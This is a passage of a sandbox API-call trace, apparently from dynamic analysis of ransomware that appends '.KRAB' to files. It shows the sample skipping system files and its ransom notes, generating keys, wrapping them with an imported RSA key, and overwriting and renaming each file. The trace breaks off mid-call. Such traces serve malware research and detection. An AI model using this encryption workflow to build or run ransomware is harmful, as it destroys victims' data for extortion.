lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\KRAB-DECRYPT.txt" [0087.585] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.585] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\KRAB-DECRYPT.txt.KRAB") returned 64 [0087.585] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\KRAB-DECRYPT.txt") returned 59 [0087.586] lstrlenW (lpString=".txt") returned 4 [0087.586] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.586] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0087.586] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.586] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\KRAB-DECRYPT.txt") returned 59 [0087.586] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\KRAB-DECRYPT.txt") returned 59 [0087.586] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0087.586] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0087.586] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0087.586] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0087.586] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0087.586] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0087.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0087.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0087.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0087.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0087.587] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.587] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0087.587] lstrcmpW (lpString1="NXL8NJ_C.ots", lpString2=".") returned 1 [0087.587] lstrcmpW (lpString1="NXL8NJ_C.ots", lpString2="..") returned 1 [0087.587] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\", lpString2="NXL8NJ_C.ots" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\NXL8NJ_C.ots") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\NXL8NJ_C.ots" [0087.587] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.587] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\NXL8NJ_C.ots.KRAB") returned 60 [0087.588] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\NXL8NJ_C.ots") returned 55 [0087.588] lstrlenW (lpString=".ots") returned 4 [0087.588] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.588] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ots ") returned 5 [0087.588] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.588] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\NXL8NJ_C.ots") returned 55 [0087.588] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\NXL8NJ_C.ots") returned 55 [0087.588] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="desktop.ini") returned 1 [0087.588] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="autorun.inf") returned 1 [0087.588] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="ntuser.dat") returned 1 [0087.588] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="iconcache.db") returned 1 [0087.589] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="bootsect.bak") returned 1 [0087.589] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="boot.ini") returned 1 [0087.589] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="ntuser.dat.log") returned 1 [0087.589] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="thumbs.db") returned -1 [0087.589] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="KRAB-DECRYPT.html") returned 1 [0087.589] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="KRAB-DECRYPT.txt") returned 1 [0087.589] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="CRAB-DECRYPT.txt") returned 1 [0087.589] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="ntldr") returned 1 [0087.589] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="NTDETECT.COM") returned 1 [0087.589] lstrcmpiW (lpString1="NXL8NJ_C.ots", lpString2="Bootfont.bin") returned 1 [0087.589] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.589] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011898) returned 1 [0087.591] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.591] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.591] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.591] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0087.592] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0087.592] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.592] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011898) returned 1 [0087.603] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.603] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.604] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.604] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0087.604] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0087.604] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.604] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10108a8) returned 1 [0087.606] CryptImportKey (in: hProv=0x10108a8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x10235f8) returned 1 [0087.606] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0087.606] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0087.606] GetLastError () returned 0x0 [0087.606] CryptDestroyKey (hKey=0x10235f8) returned 1 [0087.606] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0087.606] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011238) returned 1 [0087.608] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1023338) returned 1 [0087.608] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0087.608] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0087.608] GetLastError () returned 0x0 [0087.608] CryptDestroyKey (hKey=0x1023338) returned 1 [0087.608] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0087.608] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\NXL8NJ_C.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\nxl8nj_c.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0087.609] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0087.609] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0087.610] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x10b18, lpOverlapped=0x0) returned 1 [0087.623] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef4e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.623] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x10b18, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x10b18, lpOverlapped=0x0) returned 1 [0087.624] WriteFile (in: hFile=0x474, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0087.624] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.635] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.635] CloseHandle (hObject=0x474) returned 1 [0087.636] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.636] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\NXL8NJ_C.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\nxl8nj_c.ots"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\NXL8NJ_C.ots.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\nxl8nj_c.ots.krab")) returned 1 [0087.637] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.637] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0087.637] lstrcmpW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2=".") returned 1 [0087.637] lstrcmpW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="..") returned 1 [0087.637] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\", lpString2="_8p73aPgnECcteGV0s.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\_8p73aPgnECcteGV0s.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\_8p73aPgnECcteGV0s.wav" [0087.637] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.637] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\_8p73aPgnECcteGV0s.wav.KRAB") returned 70 [0087.638] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\_8p73aPgnECcteGV0s.wav") returned 65 [0087.638] lstrlenW (lpString=".wav") returned 4 [0087.638] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.638] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0087.638] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.638] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\_8p73aPgnECcteGV0s.wav") returned 65 [0087.638] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\_8p73aPgnECcteGV0s.wav") returned 65 [0087.638] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="desktop.ini") returned -1 [0087.638] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="autorun.inf") returned -1 [0087.638] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="ntuser.dat") returned -1 [0087.638] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="iconcache.db") returned -1 [0087.639] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="bootsect.bak") returned -1 [0087.639] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="boot.ini") returned -1 [0087.639] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="ntuser.dat.log") returned -1 [0087.639] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="thumbs.db") returned -1 [0087.639] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0087.639] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.639] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.639] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="ntldr") returned -1 [0087.639] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="NTDETECT.COM") returned -1 [0087.639] lstrcmpiW (lpString1="_8p73aPgnECcteGV0s.wav", lpString2="Bootfont.bin") returned -1 [0087.639] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.639] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011458) returned 1 [0087.641] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.641] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.642] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.642] CryptGenRandom (in: hProv=0x1011458, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0087.642] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0087.642] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.642] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011018) returned 1 [0087.643] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.644] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0087.644] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0087.644] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0087.644] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0087.644] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.645] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010f08) returned 1 [0087.646] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1023278) returned 1 [0087.646] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0087.646] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0087.647] GetLastError () returned 0x0 [0087.647] CryptDestroyKey (hKey=0x1023278) returned 1 [0087.647] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0087.647] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0087.648] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x10231f8) returned 1 [0087.648] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0087.648] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0087.649] GetLastError () returned 0x0 [0087.649] CryptDestroyKey (hKey=0x10231f8) returned 1 [0087.649] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0087.649] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\_8p73aPgnECcteGV0s.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\_8p73apgnecctegv0s.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0087.649] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0087.650] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0087.650] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x18f8a, lpOverlapped=0x0) returned 1 [0087.665] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe7076, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.665] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x18f8a, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x18f8a, lpOverlapped=0x0) returned 1 [0087.665] WriteFile (in: hFile=0x474, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0087.665] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.669] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.670] CloseHandle (hObject=0x474) returned 1 [0087.670] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.670] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\_8p73aPgnECcteGV0s.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\_8p73apgnecctegv0s.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\_8p73aPgnECcteGV0s.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\_8p73apgnecctegv0s.wav.krab")) returned 1 [0087.687] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.687] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0087.687] FindClose (in: hFindFile=0x1022ff8 | out: hFindFile=0x1022ff8) returned 1 [0087.688] CloseHandle (hObject=0x3a8) returned 1 [0087.688] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0087.688] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0087.688] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0087.688] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\KRAB-DECRYPT.txt" [0087.688] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.688] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\KRAB-DECRYPT.txt.KRAB") returned 56 [0087.688] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\KRAB-DECRYPT.txt") returned 51 [0087.688] lstrlenW (lpString=".txt") returned 4 [0087.688] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.689] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0087.689] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.689] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\KRAB-DECRYPT.txt") returned 51 [0087.689] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\KRAB-DECRYPT.txt") returned 51 [0087.689] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0087.689] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0087.689] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0087.689] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0087.689] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0087.689] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0087.689] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0087.689] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0087.689] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0087.689] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0087.690] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.690] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0087.690] lstrcmpW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2=".") returned 1 [0087.690] lstrcmpW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="..") returned 1 [0087.690] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\", lpString2="P-v4C7pNfWf7JxZ.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\P-v4C7pNfWf7JxZ.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\P-v4C7pNfWf7JxZ.docx" [0087.690] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.690] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\P-v4C7pNfWf7JxZ.docx.KRAB") returned 60 [0087.690] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\P-v4C7pNfWf7JxZ.docx") returned 55 [0087.690] lstrlenW (lpString=".docx") returned 5 [0087.690] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.691] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0087.691] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.691] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\P-v4C7pNfWf7JxZ.docx") returned 55 [0087.691] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\P-v4C7pNfWf7JxZ.docx") returned 55 [0087.691] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="desktop.ini") returned 1 [0087.691] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="autorun.inf") returned 1 [0087.691] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="ntuser.dat") returned 1 [0087.691] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="iconcache.db") returned 1 [0087.691] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="bootsect.bak") returned 1 [0087.691] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="boot.ini") returned 1 [0087.691] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="ntuser.dat.log") returned 1 [0087.691] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", lpString2="thumbs.db") returned -1 [0087.692] lstrcmpiW (lpString1="P-v4C7pNfWf7JxZ.docx", 